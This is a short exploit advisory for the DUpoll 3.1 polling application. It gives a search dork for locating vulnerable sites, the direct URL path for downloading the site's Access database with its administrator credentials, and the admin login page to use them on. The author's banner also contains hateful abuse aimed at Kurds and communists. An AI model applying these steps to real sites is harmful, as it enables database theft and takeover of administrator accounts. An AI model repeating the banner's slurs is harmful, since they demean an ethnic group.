DUPoll version 3.1 suffers from a direct database download flaw.
7fbedcd8adf34eb6128cf1dfa090cfdb841678947048166f064cff17b132aa6a
#############################################################################
#DUpoll 3.1 application bug #
# #
#BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü İnternet korsanı #
# #
#kahrolsun pkk kahrolsun Komünizm fuck kurdish lamerz #
# #
#Discovered by: BoZKuRTSeRDaR bozkurtserdar[at]bozkurtserdar[dot]com #
# #
# #
#############################################################################
Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/
Dork/Search for: "Powered by DUpoll"
Exploit :
http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb
database downloading
database users table administratory users and pasword
go dir
http://www.target.com/[DUpollpatch]/admin/default.asp
Security Adivisory | Edithor by BoZKuRTSeRDaR